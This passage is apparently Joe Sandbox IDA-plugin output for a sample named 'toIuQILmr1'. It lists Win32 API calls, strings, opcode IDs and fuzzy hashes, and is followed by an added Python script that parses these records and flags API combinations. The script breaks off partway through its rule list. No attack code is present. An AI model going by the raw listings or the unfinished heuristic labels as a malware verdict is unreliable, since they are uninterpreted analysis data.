                                          • VariantInit.OLEAUT32(?), ref: 00E48928
                                          • CharUpperBuffW.USER32(?,?), ref: 00E48A37
                                          • VariantClear.OLEAUT32(?), ref: 00E48BAF
                                            • Part of subcall function 00E37804: VariantInit.OLEAUT32(00000000), ref: 00E37844
                                            • Part of subcall function 00E37804: VariantCopy.OLEAUT32(00000000,?), ref: 00E3784D
                                            • Part of subcall function 00E37804: VariantClear.OLEAUT32(00000000), ref: 00E37859
                                          Strings
                                          Similarity
                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                          • API String ID: 4237274167-1221869570
                                          • Opcode ID: 90a34f6d493d4379f38523ed80207866195a7540896dbeefdeed56b1c1c5cc7c
                                          • Instruction ID: 7c2f460961494ff54dfba63776d19ed7c9cf9fd66f890c72bb5921f69b32adef
                                          • Opcode Fuzzy Hash: 90a34f6d493d4379f38523ed80207866195a7540896dbeefdeed56b1c1c5cc7c
                                          • Instruction Fuzzy Hash: E291AE746083019FC714DF24D58496EBBE4EF88304F04996EF89AAB361DB31E905CB62
                                          APIs
                                            • Part of subcall function 00DEFEC6: _wcscpy.LIBCMT ref: 00DEFEE9
                                          • _memset.LIBCMT ref: 00E33077
                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E330A6
                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E33159
                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E33187
                                          Strings
                                          Similarity
                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                          • String ID: 0
                                          • API String ID: 4152858687-4108050209
                                          • Opcode ID: d0ea946302d081bc0d75c352b01d76820ce682d38b2951b3f25a0d64aafe9147
                                          • Instruction ID: af48a14a709b13f1e1bf18c26621871f085e22d15362e20964558ada7216ea70
                                          • Opcode Fuzzy Hash: d0ea946302d081bc0d75c352b01d76820ce682d38b2951b3f25a0d64aafe9147
                                          • Instruction Fuzzy Hash: FD5190316093009AD7299B34D849A6BBFE4EF85354F045A2EF895F3291DB60CE44CBA2
                                          APIs
                                          • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00E2DAC5
                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00E2DAFB
                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00E2DB0C
                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00E2DB8E
                                          Strings
                                          Similarity
                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                          • String ID: DllGetClassObject
                                          • API String ID: 753597075-1075368562
                                          • Opcode ID: 37446d1aa6ee97f7032ca249e73600f460c54aaa9c69fcbfd4e8a825a0e91a1d
                                          • Instruction ID: fb5e8e08fa4a311e7cd94466a32688a4a44da61b1b648c768d93c009f85bbcc6
                                          • Opcode Fuzzy Hash: 37446d1aa6ee97f7032ca249e73600f460c54aaa9c69fcbfd4e8a825a0e91a1d
                                          • Instruction Fuzzy Hash: 8A41B1B1604218EFDB04CF65DC84A9ABBB9EF44310F1590A9EE09EF206D7B0DD44CBA0
                                          APIs
                                          • _memset.LIBCMT ref: 00E32CAF
                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E32CCB
                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00E32D11
                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E96890,00000000), ref: 00E32D5A
                                          Strings
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem_memset
                                          • String ID: 0
                                          • API String ID: 1173514356-4108050209
                                          • Opcode ID: 65f6370fa80852b66602c8668b34f8ad953d2dfde1b51372dd06cd157465d0aa
                                          • Instruction ID: 5aa9686966e486f03184dcc7c3dc673a2aa77f87774e5a95797431bad570973e
                                          • Opcode Fuzzy Hash: 65f6370fa80852b66602c8668b34f8ad953d2dfde1b51372dd06cd157465d0aa
                                          • Instruction Fuzzy Hash: A24193302043029FD724DF24C849B6ABBE4EF85324F14565EFAA5A72D1DB70E904CBA2
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E4DAD9
                                            • Part of subcall function 00DD79AB: _memmove.LIBCMT ref: 00DD79F9
                                          Strings
                                          Similarity
                                          • API ID: BuffCharLower_memmove
                                          • String ID: cdecl$none$stdcall$winapi
                                          • API String ID: 3425801089-567219261
                                          • Opcode ID: b25928007ab0b48596893e4db27c1924055189954e207a38cf95ba33915648d2
                                          • Instruction ID: c24105116d872da91f0a8213b1a8419ea150c554922609896552af300a731625
                                          • Opcode Fuzzy Hash: b25928007ab0b48596893e4db27c1924055189954e207a38cf95ba33915648d2
                                          • Instruction Fuzzy Hash: 7731C17090461AAFCF10EF54DC819FEB7B4FF45310B109A6AE865B7791DB31A905CBA0
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E2B0E7
                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E293F6
                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E29409
                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E29439
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$_memmove$ClassName
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 365058703-1403004172
                                          • Opcode ID: eecb3535d5db0504210f7244831c69b83594a3c2826e550640f8377cacb8d210
                                          • Instruction ID: 29663d442a2ddb38926373969a19b0fe712060b10603c0875a8af5b740671af1
                                          • Opcode Fuzzy Hash: eecb3535d5db0504210f7244831c69b83594a3c2826e550640f8377cacb8d210
                                          • Instruction Fuzzy Hash: 9421D271900214BEDB14AB70EC85CFFB7B8DF05354F14652AF925A72E2DB35090A9630
                                          APIs
                                            • Part of subcall function 00DD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DD1D73
                                            • Part of subcall function 00DD1D35: GetStockObject.GDI32(00000011), ref: 00DD1D87
                                            • Part of subcall function 00DD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DD1D91
                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E566D0
                                          • LoadLibraryW.KERNEL32(?), ref: 00E566D7
                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E566EC
                                          • DestroyWindow.USER32(?), ref: 00E566F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                          • String ID: SysAnimate32
                                          • API String ID: 4146253029-1011021900
                                          • Opcode ID: c0e58f987d42d473abcd8e8ea39ce193c4bc4968d7c0b1960d51971292b6a097
                                          • Instruction ID: 0afe903e8e5891867dd783590a42e0a9f6942c06aff34252f10521ea8ba3a8c5
                                          • Opcode Fuzzy Hash: c0e58f987d42d473abcd8e8ea39ce193c4bc4968d7c0b1960d51971292b6a097
                                          • Instruction Fuzzy Hash: 3721CF71100205AFEF108F64DC80EBB77ADEB1932AF902A2AFD11B3190C7B1CC499760
                                          APIs
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00E3705E
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E37091
                                          • GetStdHandle.KERNEL32(0000000C), ref: 00E370A3
                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00E370DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: 3a33570891684039d86f5930981ee3628124aea7b7bdbbce8bc8805cadaeb3fe
                                          • Instruction ID: adbf0dfa3744a8499b427c8bbd9be5ea03de3f1268418eb44aba3e1e14686ae1
                                          • Opcode Fuzzy Hash: 3a33570891684039d86f5930981ee3628124aea7b7bdbbce8bc8805cadaeb3fe
                                          • Instruction Fuzzy Hash: 48217FB4604309ABDF349F39D809A9A7BE8AF44724F205A19F8E0F72D0D7719840CB50
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00E3712B
                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E3715D
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00E3716E
                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00E371A8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CreateHandle$FilePipe
                                          • String ID: nul
                                          • API String ID: 4209266947-2873401336
                                          • Opcode ID: 06161656d8bef5476b246bf6c27e9eabdf04fafa6c91438056e142c120d0260f
                                          • Instruction ID: 95ac649960a888990e239752fc2bf197d1edb3858109c14668036eb15be7b725
                                          • Opcode Fuzzy Hash: 06161656d8bef5476b246bf6c27e9eabdf04fafa6c91438056e142c120d0260f
                                          • Instruction Fuzzy Hash: 3B21A4B6605305ABDF309F699C08AAABBE8AF55724F201A19FCE0F72D0D7709841CB50
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E3AEBF
                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00E3AF13
                                          • __swprintf.LIBCMT ref: 00E3AF2C
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,00E5F910), ref: 00E3AF6A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume__swprintf
                                          • String ID: %lu
                                          • API String ID: 3164766367-685833217
                                          • Opcode ID: ebd3eaef3879722180764789e97134b04c0b60a8a38828b5960238a407b85c52
                                          • Instruction ID: bd90c521d1f4f4694dfe3bb413c811961063af136f8dd6169703a2267a0db522
                                          • Opcode Fuzzy Hash: ebd3eaef3879722180764789e97134b04c0b60a8a38828b5960238a407b85c52
                                          • Instruction Fuzzy Hash: 1E217470600209AFCB10EF65C985DAEBBB8EF49704B014069F909EB351DB31EE45CB71
                                          APIs
                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                            • Part of subcall function 00E2A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E2A399
                                            • Part of subcall function 00E2A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E2A3AC
                                            • Part of subcall function 00E2A37C: GetCurrentThreadId.KERNEL32 ref: 00E2A3B3
                                            • Part of subcall function 00E2A37C: AttachThreadInput.USER32(00000000), ref: 00E2A3BA
                                          • GetFocus.USER32 ref: 00E2A554
                                            • Part of subcall function 00E2A3C5: GetParent.USER32(?), ref: 00E2A3D3
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00E2A59D
                                          • EnumChildWindows.USER32(?,00E2A615), ref: 00E2A5C5
                                          • __swprintf.LIBCMT ref: 00E2A5DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                          • String ID: %s%d
                                          • API String ID: 1941087503-1110647743
                                          • Opcode ID: be52ad9a9bf1b667a2c69440c4d3f13afde6db3bbdc63bb2a4c733b470e8bdbb
                                          • Instruction ID: c8eae8b44cc7779c8fe59977b96d861147d71dbc29db4f0c52caa39491029207
                                          • Opcode Fuzzy Hash: be52ad9a9bf1b667a2c69440c4d3f13afde6db3bbdc63bb2a4c733b470e8bdbb
                                          • Instruction Fuzzy Hash: 27116D71600319ABDF11BF64EC85FEA37A9EF48701F0850B6F908BA152DA7059458B75
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00E32048
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                          • API String ID: 3964851224-769500911
                                          • Opcode ID: 1f963f0d7d8d7037246db4ccd0072c1c6a03fe667058666bc25aeafc41a6b917
                                          • Instruction ID: c8eebd99c5b04463cf73cdf630c0826e627b6b9ee6895202af14e9617c1df063
                                          • Opcode Fuzzy Hash: 1f963f0d7d8d7037246db4ccd0072c1c6a03fe667058666bc25aeafc41a6b917
                                          • Instruction Fuzzy Hash: BE115E709001198FCF14EFA4D8554FEBBB4FF56304F109469D99977262EB32690ACF60
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00E4EF1B
                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00E4EF4B
                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00E4F07E
                                          • CloseHandle.KERNEL32(?), ref: 00E4F0FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                          • String ID:
                                          • API String ID: 2364364464-0
                                          • Opcode ID: 91c0d2a12efec676091381946baafed21cc3d127dd192450bc88764b95752e2d
                                          • Instruction ID: bab34e0cc088dc2ad4da54d4dda54cec826b69a9b9ec3e3633d7ae3a0e981254
                                          • Opcode Fuzzy Hash: 91c0d2a12efec676091381946baafed21cc3d127dd192450bc88764b95752e2d
                                          • Instruction Fuzzy Hash: 6E8182B16003109FD720EF28D856F2AB7E5EF88B10F04981EF595EB392DB71AC008B61
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E50038,?,?), ref: 00E510BC
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E50388
                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E503C7
                                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00E5040E
                                          • RegCloseKey.ADVAPI32(?,?), ref: 00E5043A
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E50447
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                          • String ID:
                                          • API String ID: 3440857362-0
                                          • Opcode ID: 198823531b1baaf31577e16b9d9343f8afae34ca8095d1254505ceb326950b02
                                          • Instruction ID: e45858235c0a3516136e3e8f9a09068f94eaf3c392bbb66e7179e690a629e7d9
                                          • Opcode Fuzzy Hash: 198823531b1baaf31577e16b9d9343f8afae34ca8095d1254505ceb326950b02
                                          • Instruction Fuzzy Hash: 7D513971208204AFD704EF64DC91E6EB7E8FF84315F04996EF995A7291DB31E908CB62
                                          APIs
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E4DC3B
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00E4DCBE
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00E4DCDA
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00E4DD1B
                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00E4DD35
                                            • Part of subcall function 00DD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E37B20,?,?,00000000), ref: 00DD5B8C
                                            • Part of subcall function 00DD5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E37B20,?,?,00000000,?,?), ref: 00DD5BB0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                          • String ID:
                                          • API String ID: 327935632-0
                                          • Opcode ID: 9f1e34d25e2543a4468b740a64dd2a4415e0a5f72d95fba0ba003887d1e5f58d
                                          • Instruction ID: 279b84f007213f18981d22ff08e57c012a59d9cee909165465e4733365b7710e
                                          • Opcode Fuzzy Hash: 9f1e34d25e2543a4468b740a64dd2a4415e0a5f72d95fba0ba003887d1e5f58d
                                          • Instruction Fuzzy Hash: AD512735A04605DFCB04EF68D8949ADF7F4FF48314B0591AAE819AB312DB31AD45CFA1
                                          APIs
                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E3E88A
                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00E3E8B3
                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E3E8F2
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E3E917
                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E3E91F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                          • String ID:
                                          • API String ID: 1389676194-0
                                          • Opcode ID: d7bd94b168fa09c7d3f2c2f9d1e5905b5a906cbc9791c2ec322631ed0a5c6680
                                          • Instruction ID: 5996fb99cc3de03f2efc2e4b99308a2e77cb90b279e4b8a82c958b2a0a9331e7
                                          • Opcode Fuzzy Hash: d7bd94b168fa09c7d3f2c2f9d1e5905b5a906cbc9791c2ec322631ed0a5c6680
                                          • Instruction Fuzzy Hash: 9D512A39A00205EFCB05EF64C995AAEBBF5EF08314F149499E849AB361CB31ED51DF60
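The records above list raw API call sequences without interpretation. As an added example, not part of the Joe Sandbox report or its tooling, the Python below parses records in the plain-text layout shown on this page and flags combinations a triager would want to look at: CreatePipe plus CreateFileW("nul") (standard handles pointed at the NUL device), SetErrorMode plus GetVolumeInformationW (drive serial read with critical-error dialogs suppressed), RegConnectRegistryW plus RegEnumKeyExW, and LoadLibraryW plus GetProcAddress. The rule labels are this editor's reading of the Win32 API semantics, not sandbox verdicts. The sample input is an abridged copy of three records from this page, and the parser assumes each record ends with its "Instruction Fuzzy Hash" line; a record cut off before that line, as at the end of this page, is dropped rather than guessed at.

```python
# Added triage helper (not Joe Sandbox code): parses the function records of this report.
import re
from collections import namedtuple
from dataclasses import dataclass, field

# One API bullet: optional subcall prefix, Api.MODULE, optional (args), "ref: <addr>"
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
META_KEYS = {"Source File", "Snapshot File", "API ID", "String ID", "API String ID",
             "Opcode ID", "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash"}
# args are hex literals or '?' (unresolved by the sandbox); subcall is the callee address or None
ApiCall = namedtuple("ApiCall", "api module args ref subcall")

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # '$'-separated "String ID" field
    meta: dict = field(default_factory=dict)

    def api_names(self):
        return {c.api for c in self.calls}

def parse_records(text):
    """Split report text into records; 'Instruction Fuzzy Hash' is the last field of each."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
            continue
        key, sep, val = line.partition(":")
        if sep and key in META_KEYS:
            cur.meta[key] = val = val.strip()
            if key == "String ID":
                cur.strings = val.split("$") if val else []
            elif key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    return records  # a record cut off before its fuzzy hash (truncated page) is dropped

# (label, predicate) pairs; labels are this editor's reading of the API combinations
RULES = [
    ('stdio redirected to the NUL device: CreatePipe plus CreateFileW("nul")',
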